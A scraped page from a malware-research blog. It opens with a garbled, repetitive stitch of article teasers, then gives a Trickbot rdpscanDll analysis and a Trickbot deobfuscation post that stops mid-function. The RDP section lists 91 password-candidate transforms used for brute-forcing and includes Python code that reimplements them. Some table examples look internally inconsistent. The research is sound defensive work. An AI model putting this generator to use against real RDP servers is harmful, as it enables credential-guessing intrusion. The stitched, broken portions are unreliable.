CYBER.WTF

Authors: Luca Ebach, Tilman Frosch. Rejoice everyone, today we pushed bindifflib to our Github! Bindifflib is a framework to build a set of libraries with a set of different compilers, currently the compilers of Visual Studio 2010, 2013, 2015, and 2017 – both 32 bit and 64 bit.

WTF? – CYBER.WTF

In both cases, the liberal use of ‘cyber’ adds nothing to the discussion¹. When we navigate around the sales lingo and look at the technology beyond, we find ourselves in the land of computers, networks, registers, packets and the like. And, let’s be honest, often enough when we look at technology in enough detail, ‘wtf?’ is a not an

TRICKBOT RDPSCANDLL

Trickbot rdpscanDll – Transforming Candidate Credentials for Brute-Forcing RDP Servers. After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020, I focused on checking

IMPRINT – CYBER.WTF

Imprint. G DATA | Advanced Analytics GmbH. G DATA Campus. Königsallee 178. D-44799 Bochum. Management Board. Dr. Tilman Frosch, Michael Zimmer. HRB

TWO COVERT CHANNELS

The simplest use for a side channel is the so called covert channel. Most microarchitecture side channels can be used to communicate between two trust domains when an attacker has access to both. An attacker can use covert channels for data exfiltration. The most important two reasons are to stay hidden or because regular channels are not open.

USING IDA PYTHON TO ANALYZE TRICKBOT

So the actual magic happens in sub_40E970(): We see a single call to sub_404080(). But most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”.

CACHE SIDE CHANNEL ATTACKS: CPU DESIGN AS A SECURITY

Further that the cache design is not a requirement to be an x86, that is the cache could be designed differently and be less useful for cache side channel attacks without causing software incompatibility. The bandwidth of the side channel is essentially the bandwidth of the cache and thus a lot of valuable data can be leaked.

DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE

Introduction. Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use Domain Generation Algorithms (DGA) to generate and register many different domains for their Command-and-Control (C&C) server with the purpose to defend it from takeovers and

EMOTET HARVESTS MICROSOFT OUTLOOK

Emotet harvests Microsoft Outlook. The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by


BEHIND THE SCENES OF A BUG COLLISION

Introduction. In this blog post I'll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPUs concurrently. The conclusion is that the bug was ripe because of a years long build up of knowledge about CPU security, carried out by many research groups. I'll also detail the

DISSECTING OLYMPIC DESTROYER

Introduction. After a destructive cyber attack had hit this year's olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage. A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so analysis for pure

COVERT SHOTGUN

Covert shotgun currently only uses a handful of instructions at once and thus is unlikely to be able to find side channels in this cache. The cache however is particularly interesting as it would give information on instructions in the cache. Once parsed the myOps are

MASSCAN & THE PROBLEMS OF STATIC DETECTION OF

Introduction. Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in mind, the search

THE KINGS IN YOUR CASTLE PART #1

The Kings In Your Castle Part #1. All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits

MICRO ARCHITECTURE ATTACKS ON KASLR

Introduction. Recently a number of different micro architecture attacks on Kernel Address Space Layout Randomization (KASLR) have been published. The idea behind KASLR is that code reuse attacks and read/write primitives are useless if the attacker is unable to tell where what code/data is. Consequently modern operating systems randomize the virtual addresses where code/data is stored.

ZEUS PANDA: DOWN TO THE ROOTS

Zeus Panda: Down To The Roots. Some time ago, we analyzed Panda’s webinjects to get an insight in how they actually work and to understand their communication with the ATS servers (read it here: part 1, part 2). In the last few weeks, we drilled down on the binary itself and had a closer look on this side of the Zeus.Panda malware.


WTF? – CYBER.WTF

Isn't that what you think when you see that yet another person prefixed yet another -once meaningful- noun with 'cyber'? Call us old-fashioned, but underneath cyber*, there is either something very ordinary and someone trying hard for a better headline, or something very much nuanced and someone glazing over these depths and nuances

with a

TRICKBOT RDPSCANDLL

After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020, I focused on checking whether or not the command-and-control (C2) communication of the module remained IMPRINT – CYBER.WTF G DATA | Advanced Analytics GmbH G DATA Campus Königsallee 178 D-44799 Bochum Management Board Dr. Tilman Frosch, Michael Zimmer HRB Bochum 15802 VAT-Number DE 303 701 188 E

TWO COVERT CHANNELS

Introduction Too much WinWord. Too much Tex. Too many meetings. Too little CPU. It was time for a short pause from the grind and dig into some tetravalent metalloid. My current project was too big a mouthful to get into before going to Black Hat, so I dug up a pet project to

play around

decided to do that

EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April

2017.

DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE

Introduction. Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use Domain Generation Algorithms (DGA) to generate and register many different domains for their Command-and-Control (C&C) server with the purpose to defend it from takeovers and

THE KINGS IN YOUR CASTLE PART #1

All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits, the presence or absence of patterns


COVERT SHOTGUN

Automatically finding SMT covert channels Introduction In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in the victim context and uses his channel to “smuggle DISSECTING OLYMPIC DESTROYER Introduction After a destructive cyber attack had hit this year's olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage. A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so

analysis for pure



Automatically finding SMT covert channels Introduction In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April

2017.

NEGATIVE RESULT: READING KERNEL MEMORY FROM USER MODEKERNEL MEMORY DUMPKERNEL MEMORY LAYOUTLINUX KERNEL MEMORYLINUX KERNEL MEMORY

MANAGEMENT

I were going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is and if not you got all the more reason to read this blog post. If you think it’s trivial why my result is negative, you

definitely need to


ANALYSIS – CYBER.WTF Introduction. After a destructive cyber attack had hit this year’s olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage.A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so analysis for pure curiosity had to wait.


TILMAN FROSCH

However, I came to enjoy civilization and as most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year and as a human, who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients

MARION MARSCHALEK

All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits, the presence or absence of patterns within advanced persistent threats (APTs).

ZEUS PANDA WEBINJECTS: DON’T TRUST YOUR EYES

1: The SL branch is triggered at the beginning of the attack, when an infected victim accesses the login page of the targeted online banking, inserts the login credentials and clicks on the submit button. (NOTE: The low level Trojan functions need to trigger the initial webinject (generic loader) on that website and therefore the URL of the online banking website has to be listed in the

DECEMBER 2016

2 posts published by Marion Marschalek during December 2016. Welcome back, to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how A.P.T. functions, how targeted malware looks like and the issues us analysts might find on

it.

JULY 2016 – CYBER.WTF 1 post published by Marion Marschalek during July 2016. Last year I held a free reverse engineering workshop for women, mainly in the not entirely un-selfish interest to see more of them around in the whole

security field.


TRICKBOT RDPSCANDLL – TRANSFORMING CANDIDATE CREDENTIALS FOR BRUTE-FORCING RDP SERVERS

After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020, I focused on checking whether or not the command-and-control (C2) communication of the module remained more or less the same or if there was anything groundbreakingly new. Short answer: there wasn’t. There may be some under-the-hood fixes or improvements but I (as of yet) did not stumble upon anything significant that wasn’t already found by Bitdefender: the module still receives its mode of action, target servers, usernames, and password candidates from the C2 server and then does what the mode tells it to do. But while I was checking that, I also had a look at the actual data that we received from the C2 server.

PASSWORD LIST

My intuition on the password list was that it is just a dictionary of words to try. This is also suggested by the URL which is used to retrieve the password list: hxxps://%c2%/%gtag%/%bot_id%/rdp/DICT. Thus I did not have a closer look at the password list at that time, because everything looked the way Bitdefender described it and I had no reason to look at it in detail. But one or two days later, I re-requested the list of passwords to see whether the list changed in the meantime – and it did indeed. Because of that I had a quick look at what changed and then I noticed that I overlooked something right from the start (literally, duh!).

On the left side of the picture you see what I had a quick look at after retrieving the password list from the C2 server with curl (and thus seeing only the last lines of the output). On the right side there is the very same password list, just seen from the start. To the keen eye it seems that they may be using some kind of templating mechanism to adjust the list of passwords and use more specific credential candidates. With that thought in mind I spun up my analysis environment and started digging into the module to see what the Trickbot gang is actually doing there (spoiler: yes, they do some kind of templating – but not just the find-and-replace kind).

TRANSFORMING THEM P@SSW0RDS

As mentioned before, this is not a simple find-and-replace but instead they can change the credential candidates to better fit the attacked host. In that sense, I decided to call those things transforms instead of templates because they are not just templates that are filled out but a little bit more dynamic. Example:

* %username%123 → myuser123 (lowercase)
* %Username%123 → Myuser123 (lowercase but first char uppercase)
* %UsErNaMe%123 → MyUsEr123 (alternating case, starting with uppercase char)
* %EMANRESU%123 → RESUYM123 (uppercase and reversed)

And that is essentially how the markers in the password list work. I was able to extract all 91 transformations that are currently available to the rdpscanDll (as of 2020-08-14). Please find the list with all transforms with an example and a description for each of them at the end of this blog post. Some of the transforms can even be parameterized to a certain degree: %OriginalUsername%, %OriginalDomain%, and %domain% can be prepended or appended with an (N) to indicate whether the first N or last N characters of the element should be used (or everything if no parameters are present).
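To make the marker idea concrete, here is a minimal Python sketch of how the four example markers (plus %uSeRnAmE% and %USERNAME% from the transform list) could be expanded. It is only an illustration of the observed behaviour, not the module's code: the names `alternating`, `TRANSFORMS`, and `expand` are made up for this sketch, and the index-based alternation is an assumption derived from the examples in this post.

```python
def alternating(text: str, start_upper: bool) -> str:
    """Alternate case by character index (assumption: non-letters also count)."""
    out = []
    for i, ch in enumerate(text):
        upper = (i % 2 == 0) == start_upper
        out.append(ch.upper() if upper else ch.lower())
    return "".join(out)


# Hypothetical lookup table: marker name -> function applied to the username.
TRANSFORMS = {
    "username": str.lower,
    "Username": str.capitalize,  # first char upper, rest lower
    "UsErNaMe": lambda u: alternating(u, True),
    "uSeRnAmE": lambda u: alternating(u, False),
    "USERNAME": str.upper,
    "EMANRESU": lambda u: u[::-1].upper(),
}


def expand(candidate: str, username: str) -> str:
    """Replace every known %marker% in a password candidate."""
    for name, transform in TRANSFORMS.items():
        # str.replace is case sensitive, so %username% and %Username% stay distinct.
        candidate = candidate.replace(f"%{name}%", transform(username))
    return candidate


if __name__ == "__main__":
    for line in ("%username%123", "%Username%123", "%UsErNaMe%123", "%EMANRESU%123"):
        print(line, "->", expand(line, "myuser"))
```

A table of small functions keeps each transform easy to check in isolation against the examples, which is handy when comparing against candidates observed in the lab.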

RECONNAISSANCE

After finding the list of transforms, I decided to ask my favorite internet search engine whether these names for the transforms are known in relation to RDP. And I indeed found an RDP brute force tool by a certain z668 which seemingly makes use of some of the transforms that are used in the rdpscanDll. Although this tool seems to be a standalone application, the names of the transforms and the context of their use could suggest a connection between z668 and the Trickbot gang – at least to a certain degree. Sure, the connection may not be really strong because the Trickbot module is written in C++ and the RDP tool seems to be written in C#. But given the fact that C# can load and use native DLLs and considering that z668 forked the FreeRDP project on GitHub, the actual scanner may indeed be written in C/C++ (and probably using FreeRDP). Thus it is possible that the Trickbot gang may have obtained the source code from z668 to integrate the RDP scanner into their module framework and to use their C2 communication protocol. But: this is just guessing based on some more or less loose facts – I could easily be completely wrong with that.

TRANSFORM LIST

TRANSFORM IDENTIFIER | EXAMPLE | DESCRIPTION
EmptyPass | | tries an empty password
GetHost | | fills in the hostname of the currently attacked IP (ex: myhost)
IP | | fills in the currently attacked IP address (ex: 234.234.234.234)
Port | | fills in the currently attacked port (ex: 3389)
IpReplaceDot | 234.234.234.234 → 234234234234 | removes the dots of the IP address
RemoveNumerics | us3rn4me → usrnme | removes all digits from the username
RemoveLetters | us3rn4m3 → 343 | removes all letters from the username
RemoveOtherSymbols | usern@m3 → usernm3 | removes all non-alphanumeric characters from the username
OriginalUsernameLettersBeginInverse | 123admin456 → 123654nimda | keeps all non-letters (i.e. digits, special chars) at the beginning of the username and reverses the rest (“invert letters begin”)
OriginalUsernameLettersBeginSwap | 123admin456 → admin456123 | swaps all non-letters (i.e. digits, special chars) at the beginning of the username with the rest (“swap letters begin”)
OriginalUsernameLettersEndInverse | admin123root → admintoor321 | keeps all letters at the beginning of the username and reverses the rest (“invert letters end”)
OriginalUsernameLettersEndSwap | admin123root → 123rootadmin | swaps all letters at the beginning of the username with the rest (“swap letters end”)
OriginalUsernameNumsBeginInverse | admin123root → admintoor321 | keeps all non-digits at the beginning of the username and reverses the rest (“invert nums begin”)
OriginalUsernameNumsBeginSwap | admin123root → 123rootadmin | swaps all non-digits at the beginning of the username with the rest (“swap nums begin”)
OriginalUsernameNumsEndInverse | 123admin → 123nimda | keeps all digits at the beginning of the username and reverses the rest (“invert nums end”)
OriginalUsernameNumsEndSwap | 123admin456 → admin456123 | swaps all digits at the beginning of the username with the rest (“swap nums end”)
OriginalUsernameInsert | %OriginalUsernameInsert%(N)SOMESTRING → SOMEusernameSTRING (ex: N = 4) | inserts the username after the Nth character of SOMESTRING
OriginalUsername | | uses the username as password
OnlyName | Firstname Lastname → Firstname | uses only the first name (everything left of the first space) of the username as password
OnlySurname | Firstname Lastname → Lastname | uses only the last name (everything right of the first space) of the username as password
username | Admin → admin | username in lowercase
Username | AdMin → Admin | username lowercase but first char upper
UsErNaMe | Admin → AdMiN | username in alternating case, starting with uppercase
uSeRnAmE | Admin → aDmIn | username in alternating case, starting with lowercase
USERNAME | Admin → ADMIN | username in uppercase
EMANRESU | Admin → NIMDA | username in uppercase and reversed
EmanresuLowercase | AdMin → Nimda | username reversed and lowercase, first char uppercase
Emanresu | AdMin → NiMdA | username reversed, first char upper
emanresuLowercase | AdMin → nimda | username reversed and lowercase
emanresuUppercase | AdMin → NIMDA | username reversed and uppercase
emanresu | Admin → nimda | username reversed and lowercase
ReplaceFirst_X-x | administrator → @dministrator (ex: %ReplaceFirst_a-@%) | replaces the first occurrence of X with x in the username (needle and replacement can be more than 1 char)
ReplaceFirstI_X-x | Administrator → @dministrator (ex: %ReplaceFirstI_a-@%) | case insensitively replaces the first occurrence of X with x in the username (needle and replacement can be more than 1 char)
ReplaceLast_X-x | administrator → administr@tor (ex: %ReplaceLast_a-@%) | replaces the last occurrence of X with x in the username (needle and replacement can be more than 1 char)
ReplaceLastI_X-x | Administrator → Administr@tor (ex: %ReplaceLastI_a-@%) | case insensitively replaces the last occurrence of X with x in the username (needle and replacement can be more than 1 char)
ReplaceAll_X-x | administrator → @dministr@tor (ex: %ReplaceAll_a-@%) | replaces all occurrences of X with x in the username (needle and replacement can be more than 1 char)
ReplaceAllI_X-x | Administrator → @dministr@tor (ex: %ReplaceAllI_a-@%) | case insensitively replaces all occurrences of X with x in the username (needle and replacement can be more than 1 char)
DomainRemoveNumerics | test-123.com → test-.com | removes all digits from the domain
DomainRemoveLetters | test-123.com → -123. | removes all letters from the domain
DomainRemoveOtherSymbols | test-123.com → test123com | removes all non-alphanum chars from the domain
OriginaldomainInsert | %OriginaldomainInsert%(N)SOMESTRING → SOMEdomainSTRING (ex: N = 4) | inserts the domain after the Nth character of SOMESTRING
OriginaldomainPart | test-123.com → 123com (ex: %OriginaldomainPart%(6)) | takes the last N chars of the domain name (ignoring any dots)
OriginaldomainNumsBeginInverse | test-123.com → test-moc.321 | keeps all non-digits at the beginning of the domain and reverses the rest (“invert nums begin”)
OriginaldomainNumsBeginSwap | test-123.com → 123.comtest- | swaps all non-digits at the beginning of the domain with the rest (“swap nums begin”)
OriginaldomainNumsEndInverse | 123-test.com → 123moc.tset- | keeps all digits at the beginning of the domain and reverses the rest (“invert nums end”)
OriginaldomainNumsEndSwap | 123-test.com → -test.com123 | swaps all digits at the beginning of the domain with the rest (“swap nums end”)
OriginaldomainLettersBeginInverse | test-123.com → test-moc.321 | keeps all non-letters (i.e. digits, special chars) at the beginning of the domain and reverses the rest (“invert letters begin”)
OriginaldomainLettersBeginSwap | 123-test.com → test.com123- | swaps all non-letters (i.e. digits, special chars) at the beginning of the domain with the rest (“swap letters begin”)
OriginaldomainLettersEndInverse | test-123.com → testmoc.321- | keeps all letters at the beginning of the domain and reverses the rest (“invert letters end”)
OriginaldomainLettersEndSwap | test-123.com → -123.comtest | swaps all letters at the beginning of the domain with the rest (“swap letters end”)
Originaldomainleft | test-123.com → test-123 | takes the left part of the domain (everything left of the first dot) and lowercases the first character
OriginalDomainleft | test-123.com → Test-123 | takes the left part of the domain (everything left of the first dot) and capitalizes the first character
Originaldomainright | test-123.com → com | takes the right part of the domain (everything right of the first dot) and lowercases the first character
OriginalDomainright | test-123.com → Com | takes the right part of the domain (everything right of the first dot) and capitalizes the first character
Originaldomain | | uses the plain domain name
OriginalDomain | test-123.com → Test-123.com | uses the domain name and capitalizes the first character
NiamodLowercase | abc%NiamodLowercase%123 | abc123
niamodLowercase | test-123.com → Moc.321-tset | reverses and lowercases the domain name, first character capitalized
niamodUppercase | test-123.com → mOC.321-TSET | reverses and uppercases the domain name, first char lowercase
domainleftHyphen | test-123.com → test | takes everything left of the first hyphen
DOMAINLEFTHYPHEN | test-123.com → TEST | takes everything left of the first hyphen, uppercased
DomainleftHyphen | test-123.com → Test | takes everything left of the first hyphen, first char capitalized
domainrightHyphen | test-123.com → 123.com | takes everything right of the first hyphen
DOMAINRIGHTHYPHEN | test-123.com → 123.COM | takes everything right of the first hyphen, uppercased
DomainrightHyphen | test-abc.com → Abc.com | takes everything right of the first hyphen, first char capitalized
domainleftUnderscore | test_123.com → test | takes everything left of the first underscore
DOMAINLEFTUNDERSCORE | test_123.com → TEST | takes everything left of the first underscore, uppercased
DomainleftUnderscore | test_123.com → Test | takes everything left of the first underscore, first char capitalized
domainrightUnderscore | test_abc.com → abc.com | takes everything right of the first underscore
DOMAINRIGHTUNDERSCORE | test_123.com → 123.COM | takes everything right of the first underscore, uppercased
DomainrightUnderscore | test_abc.com → Abc.com | takes everything right of the first underscore, first char capitalized
DomainReplaceFirst_X-x | EXAMPLE-attack.com → EXAMPLE-@ttack.com (ex: %DomainReplaceFirst_a-@%) | replaces the first occurrence of X with x in the domain (needle and replacement can be more than 1 char)
DomainReplaceFirstI_X-x | EXAMPLE-attack.com → EX@MPLE-attack.com (ex: %DomainReplaceFirstI_a-@%) | case insensitively replaces the first occurrence of X with x in the domain (needle and replacement can be more than 1 char)
DomainReplaceLast_X-x | EXAMPLE-attack.com → EXAMPLE-att@ck.com (ex: %DomainReplaceLast_a-@%) | replaces the last occurrence of X with x in the domain (needle and replacement can be more than 1 char)
DomainReplaceLastI_X-x | EXAMPLE-attack.com → EXAMPLE-att@ck.com (ex: %DomainReplaceLastI_a-@%) | case insensitively replaces the last occurrence of X with x in the domain (needle and replacement can be more than 1 char)
DomainReplaceAll_X-x | EXAMPLE-attack.com → EXAMPLE-@tt@ck.com (ex: %DomainReplaceAll_a-@%) | replaces all occurrences of X with x in the domain (needle and replacement can be more than 1 char)
DomainReplaceAllI_X-x | EXAMPLE-attack.com → EX@MPLE-@tt@ck.com (ex: %DomainReplaceAllI_a-@%) | case insensitively replaces all occurrences of X with x in the domain (needle and replacement can be more than 1 char)
niamod | test-123.com → moc.321-tset | reverses the domain name
Niamod | test-123.com → Moc.321-tset | reverses the domain name, first char capitalized
domainleft | TEST-123.com → test-123 | everything left of the first dot, lowercased
DOMAINLEFT | Test-123.com → TEST-123 | everything left of the first dot, uppercased
Domainleft | test-123.com → Test-123 | everything left of the first dot, lowercased but first char capitalized
domainright | TEST-123.com → com | everything right of the first dot, lowercased
DOMAINRIGHT | Test-123.com → COM | everything right of the first dot, uppercased
Domainright | test-123.com → Com | everything right of the first dot, lowercased but first char capitalized
domain | TEST-123.com → test-123.com | domain name, lowercase
Domain | TEST-123.com → Test-123.com | domain name lowercased, first char capitalized
DoMaIn | test-123.com → TeSt-123.cOm | domain name in alternating case, starting with uppercase
dOmAiN | test-123.com → tEsT-123.CoM | domain name in alternating case, starting with lowercase
DOMAIN | test-123.com → TEST-123.COM | domain name uppercased
NIAMOD | test-123.com → MOC.321-TSET | domain name reversed and uppercased

Author: Luca Ebach. Posted on August 31, 2020.
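The "swap", "inverse", and "replace" rows of the transform list all follow the same pattern, which the following Python sketch tries to capture. It is an approximation under stated assumptions rather than a reconstruction of the module: the helper names (`split_prefix`, `inverse`, `swap`, `replace_one`) are hypothetical, and the ASCII character classes are a guess at how rdpscanDll classifies letters and digits.

```python
import re

# Leading-run patterns (assumption: ASCII letters and digits only).
LETTERS = r"[A-Za-z]*"       # "...LettersEnd..." transforms
NON_LETTERS = r"[^A-Za-z]*"  # "...LettersBegin..." transforms
DIGITS = r"[0-9]*"           # "...NumsEnd..." transforms
NON_DIGITS = r"[^0-9]*"      # "...NumsBegin..." transforms


def split_prefix(text: str, pattern: str) -> tuple[str, str]:
    """Split text into the leading run matching pattern and the rest."""
    head = re.match(pattern, text).group(0)  # '*' patterns always match
    return head, text[len(head):]


def inverse(text: str, pattern: str) -> str:
    """Keep the leading run and reverse the rest."""
    head, rest = split_prefix(text, pattern)
    return head + rest[::-1]


def swap(text: str, pattern: str) -> str:
    """Move the leading run behind the rest."""
    head, rest = split_prefix(text, pattern)
    return rest + head


def replace_one(text: str, needle: str, repl: str,
                last: bool = False, ignore_case: bool = False) -> str:
    """Replace the first (or last) occurrence of needle, optionally ignoring case."""
    haystack = text.lower() if ignore_case else text
    target = needle.lower() if ignore_case else needle
    idx = haystack.rfind(target) if last else haystack.find(target)
    if idx < 0:
        return text
    return text[:idx] + repl + text[idx + len(needle):]


if __name__ == "__main__":
    print(inverse("123admin456", NON_LETTERS))
    print(swap("admin123root", LETTERS))
    print(replace_one("EXAMPLE-attack.com", "a", "@", ignore_case=True))
```

Checking a sketch like this against the examples in the list is a quick way to spot rows whose example does not match their description.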

Categories: analysis

Tags: analysis, brute, bruteforce, dll, force, malware, rdp, rdpscan, rdpscandll, scan, trickbot, trickster

USING IDA PYTHON TO ANALYZE TRICKBOT

INTRODUCTION

When analyzing malware, one often has to deal with lots of tricks and obfuscation techniques. In this post we will look at several obfuscation and anti-analysis techniques used by the malware Trickbot, based on the sample 8F590AC32A7C7C0DDFBFA7A70E33EC0EE6EB8D88846DEFBDA6144FADCC23663A from mid-December 2018. After analyzing and understanding the obfuscation techniques, we will take care of deobfuscating the malware with IDA Python in order to make the code easier to analyze in Hexrays’ decompiler.

RELATED WORK

With a malware as widespread and publicly known as Trickbot, there is already a lot of research. This article overlaps in places with the work of Michał Praszmo at https://www.cert.pl/en/news/single/detricking-trickbot-loader/, where some of the obfuscation features are touched upon. A similar, but more in-depth analysis by Hasherezade can be found at https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/ in conjunction with the tutorial at https://www.youtube.com/watch?v=KMcSAlS9zGE. Vitali Kremez also explained the string obfuscation of a Trickbot sample at https://www.vkremez.com/2018/07/lets-learn-trickbot-new-tor-plugin.html

OBFUSCATED IMPORT ADDRESS TABLE

If you put the unpacked binary in IDA, you can see that Trickbot has several imported functions:

Yet, the first line of the decompiled wWinMain() shows lots of function calls relative to the address stored at dword_42A648. Looking at the x-refs of this address, we can find out in which context it is written to:

Decompiling the function sub_402D30() shows that dword_42A648 points to a buffer of 0x208 bytes (or 130 DWORDs). The buffer is modified in the same function with a call to sub_40C8C0(). Note that stru_42A058 holds a pointer to a structure which we will get to know in the following function, as it is an argument for the function call to sub_40C8C0(). This call is done 8 times in a loop, as you can see in lines 21 to 27.

Within sub_40C8C0() the Hex-Rays decompiler shows the following picture:

We can see the following things:

> * The argument called “hModule” by IDA is a pointer to a structure. Its first DWORD contains a hint to a string used in LoadLibraryW() in lines 12 and 13.
> * The second DWORD of the structure is used in lines 14, 16, 18 and 21 and contains a list of hints to function names used in GetProcAddress().
> * The third DWORD of the structure is used to mark the end of the list of the second DWORD in the for-loop in line 16.
> * The fourth DWORD of the structure is used in lines 15, 16 and 20 and points to a list of offsets, which is used to calculate the address at which to store the imported functions, with the base of our previously allocated 0x208 bytes array.

Putting it all together, our structure is defined as follows:

> struct IATstruct
> {
>     DWORD offsetForDecryptionDLLname;
>     DWORD offsetForDecryptionImportNamesArrayStart;
>     DWORD offsetForDecryptionImportNamesArrayEnd;
>     DWORD IAToffset;
> };

Now our function looks much nicer:

It is now obvious that our mysterious buffer of 0x208 bytes is actually an IAT which is stored on the heap. The pointer to the IAT is located at dword_42A648, and the 383 x-refs to this address which we saw in the beginning are mostly calls to this IAT.
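To make the layout of IATstruct a bit more tangible, here is a minimal Python sketch that splits a raw byte buffer into records of four little-endian DWORDs. The field names come from the structure above; the helper name parse_iat_structs and the demo bytes are made up for illustration and are not taken from the sample.

```python
import struct
from collections import namedtuple

# Field names follow the IATstruct definition from the article.
IATStruct = namedtuple(
    "IATStruct",
    [
        "offsetForDecryptionDLLname",
        "offsetForDecryptionImportNamesArrayStart",
        "offsetForDecryptionImportNamesArrayEnd",
        "IAToffset",
    ],
)

ENTRY_FORMAT = "<4I"  # four little-endian 32-bit DWORDs
ENTRY_SIZE = struct.calcsize(ENTRY_FORMAT)  # 16 bytes per record


def parse_iat_structs(raw, count=8):
    """Split `raw` into `count` consecutive IATStruct records."""
    return [
        IATStruct(*struct.unpack_from(ENTRY_FORMAT, raw, i * ENTRY_SIZE))
        for i in range(count)
    ]


# Made-up demo bytes (two records), only to show the layout.
demo = struct.pack("<8I", 0x10, 0x14, 0x20, 0x0, 0x24, 0x28, 0x30, 0x40)
entries = parse_iat_structs(demo, count=2)
for entry in entries:
    print(entry)
```

In IDA the raw bytes would be read from the database instead of being packed by hand; the default of eight records mirrors the eight loop iterations seen in sub_402D30().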

DECRYPT ALL STRINGS

Now the question remains what the functions sub_407110() and sub_405210() are doing to yield library and function names. When disassembling them, you can see that both call sub_40E970(). Only the first one, sub_407110(), has an additional call after that, but that is only used to transform a string to a wide string:

So the actual magic happens in sub_40E970():

We see a single call to sub_404080(). Most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”. Looking at Src, we can see it is a table with offsets to some scrambled strings:

So the argument a1 is simply an offset into the table pointed to by Src and decides which of the strings is provided to sub_404080(). When looking at sub_404080(), we can see a function which has over 100 lines of disassembled code. I just chose the most relevant part to display in a screenshot:

Without going too much into detail, you can see that from line 44 to 63 a substitution takes place based on the first function argument (copied to “Dst”) and the string pointer named off_42A050 by IDA in line 44. The string looks like this:

From line 64 to 69 the previously substituted bytes are then mangled by some bit operations, where four input bytes are mapped to three output bytes. According to the blog of Vitali Kremez mentioned above, this was once a base64 algorithm with a custom alphabet. It is still similar to that, but it seems to be extended by the bit manipulation operations.

Putting it all together, we now know that each string of the IAT is scrambled by a substitution cipher and a bit manipulation algorithm. The function arguments provided to the functions sub_407110() and sub_405210() by the IAT algorithm described previously are offsets to string pointers to the scrambled strings stored at 0x00427C1C, called “Src” by IDA. We also know that sub_407110() returns a wide string, while sub_405210() returns an ANSI string. When cross referencing those two functions, we can see 159 and 52 calls to them:

Looking at the calls, we can see that the argument which describes the string offset is pushed on the stack as the second function argument, in our case 73h. The pointer to the output string is the first argument:

Looking a bit further, we can find a third function, sub_4019F0(), which calls sub_40E970() for decrypting strings. Again, the argument is provided via a push of a constant number. So we can write a simple IDA Python script to decrypt all strings and print them. The algorithm is quite simple:

> * Manually identify all three functions which call sub_40E970()
> * For each xref to one of those three functions:
>     * Disassemble backwards until we find the first push which is a number
>     * Add the base address of the crypted string table to find the referenced string
>     * Decrypt the string based on the reversed algorithm
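The “four input bytes are mapped to three output bytes” pattern mentioned above is typical for base64. As a rough illustration only, the following Python sketch decodes base64 with a custom alphabet by substituting each symbol back to the standard alphabet first. The alphabet used here is a made-up rotation of the standard one, not the string found at off_42A050, and the additional bit manipulations of this sample are deliberately not modelled.

```python
import base64

STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Hypothetical custom alphabet (the standard one rotated by 13 symbols).
# The alphabet actually used by the sample is NOT reproduced here.
CUSTOM = STANDARD[13:] + STANDARD[:13]

TO_STANDARD = str.maketrans(CUSTOM, STANDARD)
TO_CUSTOM = str.maketrans(STANDARD, CUSTOM)


def decode_custom_b64(text):
    """Substitute symbols back to the standard alphabet, then decode."""
    standard_text = text.translate(TO_STANDARD)
    standard_text += "=" * (-len(standard_text) % 4)  # restore padding
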